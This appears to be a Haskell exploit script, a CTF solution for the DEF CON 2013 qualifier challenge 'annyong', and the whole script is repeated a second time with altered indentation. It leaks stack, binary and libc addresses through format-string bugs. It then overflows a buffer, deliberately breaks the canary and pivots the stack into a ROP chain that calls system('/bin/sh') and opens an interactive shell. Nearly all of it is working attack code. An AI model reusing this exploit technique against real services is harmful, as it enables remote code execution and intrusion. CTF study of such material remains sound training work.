Tosainu/exploit.hs

## exploit.hs
#!/usr/bin/env stack
-- stack --stack-yaml ./stack.yaml runghc --package pwn

-- DEF CON CTF Qualifier 2013: annyong
-- http://shell-storm.org/repo/CTF/Defcon-21-quals/annyong/

{-# LANGUAGE OverloadedStrings #-}

import           Data.Bits
import qualified Data.ByteString.Char8 as BS
import           Data.Maybe
import           Data.Monoid           ((<>))
import           Data.Word
import           Numeric               (showHex)

-- https://github.com/Tosainu/pwn.hs
import           Pwn

main :: IO ()
main = do
  r <- remote "192.168.122.10" 4000

  let __libc_csu_init' = 0x00001130
      printf_got'      = 0x202038

      libc_printf' = 0x00050cf0
      libc_system' = 0x00041490

      -- ROP gadgets
      ret'        = 0x00000ac5       -- 0x00000ac5: ret  ;  (17 found)
      leave_ret'  = 0x00000dc1       -- 0x00000dc1: leave  ; ret  ;  (5 found)
      libc_pop_rdi_ret' = 0x00022482 -- 0x00022482: pop rdi ; ret  ;  (480 found)

      -- sub.stdin_184_8c ();
      --         ; var int buf @ rbp-0x810
      --         ; var int canary @ rbp-0x4
      canary = 0x4
      buflen = 0x810 - canary

  info "leak informations"
  -- gdb-peda$ pdisas $rip /1
  -- => 0x5555555550bc:	call   0x555555554ba0 <fgets@plt>
  -- gdb-peda$ x/300gx $rdi
  -- 0x7fffffffe150:	0x0000000000000000	0x0000000000000000
  -- 0x7fffffffe160:	0x0000000000000000	0x0000000000000000
  -- ...
  -- 0x7fffffffe920:	0x0000000000000000	0x0000555555554ad3
  -- 0x7fffffffe930:	0x00007fffffffea58	0x0000555555555175 <-- rbp2, __libc_csu_init+69
  -- 0x7fffffffe940:	0x0000000000000000	0x0000000000000000
  -- 0x7fffffffe950:	0x0000555555555130	0x0000000055554c60 <- _, canary
  -- 0x7fffffffe960:	0x00007fffffffe970	0x0000555555555127 <- rbp1, main
  -- 0x7fffffffe970:	0x0000000000000000	0x00007ffff7a52b45
  let rbp2_index            = 6 + ((0x7fffffffe930 - 0x7fffffffe150) `quot` 8)
      __libc_csu_init_index = 6 + ((0x7fffffffe938 - 0x7fffffffe150) `quot` 8)
  sendline r $ BS.pack $ "%" <> show rbp2_index            <> "$p " <>
                         "%" <> show __libc_csu_init_index <> "$p"

  rbp2:__libc_csu_init:_ <- map (read :: String -> Word64) . words . BS.unpack <$> recvline r
  let rsp  = rbp2 - 0x908
      base = __libc_csu_init - 69 - __libc_csu_init'
  success $ "rsp  = 0x" <> showHex rsp ""
  success $ "base = 0x" <> showHex base ""

  sendline r $ BS.append "%7$6s   " $ fromJust $ p64 $ base + printf_got'
  leak <- recvn r 6
  let Just libc_printf = u64 $ BS.append leak "\x00\x00"
      libc_base        = libc_printf - libc_printf'
  success $ "libc = 0x" <> showHex libc_base ""

  info "execute '/bin/sh'"
  let rophead = rsp + 0x20
      binsh   = rsp + 0x8
      rop = BS.concat $ catMaybes
            [ p64 $ libc_base + libc_pop_rdi_ret'
            , p64 binsh
            , p64 $ libc_base + libc_system'
            ]
      buf = BS.concat $ catMaybes
            [ Just "NyaNya\x00\x00"
            , Just "/bin/sh\x00"
            , p64 rsp                         -- next rbp
            , Just rop
            , Just $ BS.replicate (buflen - 0x18 - BS.length rop) 'A'
            , p32 0xdeadbeef                  -- break canary to trigger ROP
            , p64 $ rsp + 0x10                -- stack pivoting
            , p64 $ base + leave_ret'
            ]
  sendline r buf

  recvuntil r "NyaNya"
  interactive r
	#!/usr/bin/env stack
	-- stack --stack-yaml ./stack.yaml runghc --package pwn

	-- DEF CON CTF Qualifier 2013: annyong
	-- http://shell-storm.org/repo/CTF/Defcon-21-quals/annyong/

	{-# LANGUAGE OverloadedStrings #-}

	import Data.Bits
	import qualified Data.ByteString.Char8 as BS
	import Data.Maybe
	import Data.Monoid ((<>))
	import Data.Word
	import Numeric (showHex)

	-- https://github.com/Tosainu/pwn.hs
	import Pwn

	main :: IO ()
	main = do
	r <- remote "192.168.122.10" 4000

	let __libc_csu_init' = 0x00001130
	printf_got' = 0x202038

	libc_printf' = 0x00050cf0
	libc_system' = 0x00041490

	-- ROP gadgets
	ret' = 0x00000ac5 -- 0x00000ac5: ret ; (17 found)
	leave_ret' = 0x00000dc1 -- 0x00000dc1: leave ; ret ; (5 found)
	libc_pop_rdi_ret' = 0x00022482 -- 0x00022482: pop rdi ; ret ; (480 found)

	-- sub.stdin_184_8c ();
	-- ; var int buf @ rbp-0x810
	-- ; var int canary @ rbp-0x4
	canary = 0x4
	buflen = 0x810 - canary

	info "leak informations"
	-- gdb-peda$ pdisas $rip /1
	-- => 0x5555555550bc: call 0x555555554ba0 <fgets@plt>
	-- gdb-peda$ x/300gx $rdi
	-- 0x7fffffffe150: 0x0000000000000000 0x0000000000000000
	-- 0x7fffffffe160: 0x0000000000000000 0x0000000000000000
	-- ...
	-- 0x7fffffffe920: 0x0000000000000000 0x0000555555554ad3
	-- 0x7fffffffe930: 0x00007fffffffea58 0x0000555555555175 <-- rbp2, __libc_csu_init+69
	-- 0x7fffffffe940: 0x0000000000000000 0x0000000000000000
	-- 0x7fffffffe950: 0x0000555555555130 0x0000000055554c60 <- _, canary
	-- 0x7fffffffe960: 0x00007fffffffe970 0x0000555555555127 <- rbp1, main
	-- 0x7fffffffe970: 0x0000000000000000 0x00007ffff7a52b45
	let rbp2_index = 6 + ((0x7fffffffe930 - 0x7fffffffe150) `quot` 8)
	__libc_csu_init_index = 6 + ((0x7fffffffe938 - 0x7fffffffe150) `quot` 8)
	sendline r $ BS.pack $ "%" <> show rbp2_index <> "$p " <>
	"%" <> show __libc_csu_init_index <> "$p"

	rbp2:__libc_csu_init:_ <- map (read :: String -> Word64) . words . BS.unpack <$> recvline r
	let rsp = rbp2 - 0x908
	base = __libc_csu_init - 69 - __libc_csu_init'
	success $ "rsp = 0x" <> showHex rsp ""
	success $ "base = 0x" <> showHex base ""

	sendline r $ BS.append "%7$6s " $ fromJust $ p64 $ base + printf_got'
	leak <- recvn r 6
	let Just libc_printf = u64 $ BS.append leak "\x00\x00"
	libc_base = libc_printf - libc_printf'
	success $ "libc = 0x" <> showHex libc_base ""

	info "execute '/bin/sh'"
	let rophead = rsp + 0x20
	binsh = rsp + 0x8
	rop = BS.concat $ catMaybes
	[ p64 $ libc_base + libc_pop_rdi_ret'
	, p64 binsh
	, p64 $ libc_base + libc_system'
	]
	buf = BS.concat $ catMaybes
	[ Just "NyaNya\x00\x00"
	, Just "/bin/sh\x00"
	, p64 rsp -- next rbp
	, Just rop
	, Just $ BS.replicate (buflen - 0x18 - BS.length rop) 'A'
	, p32 0xdeadbeef -- break canary to trigger ROP
	, p64 $ rsp + 0x10 -- stack pivoting
	, p64 $ base + leave_ret'
	]
	sendline r buf

	recvuntil r "NyaNya"
	interactive r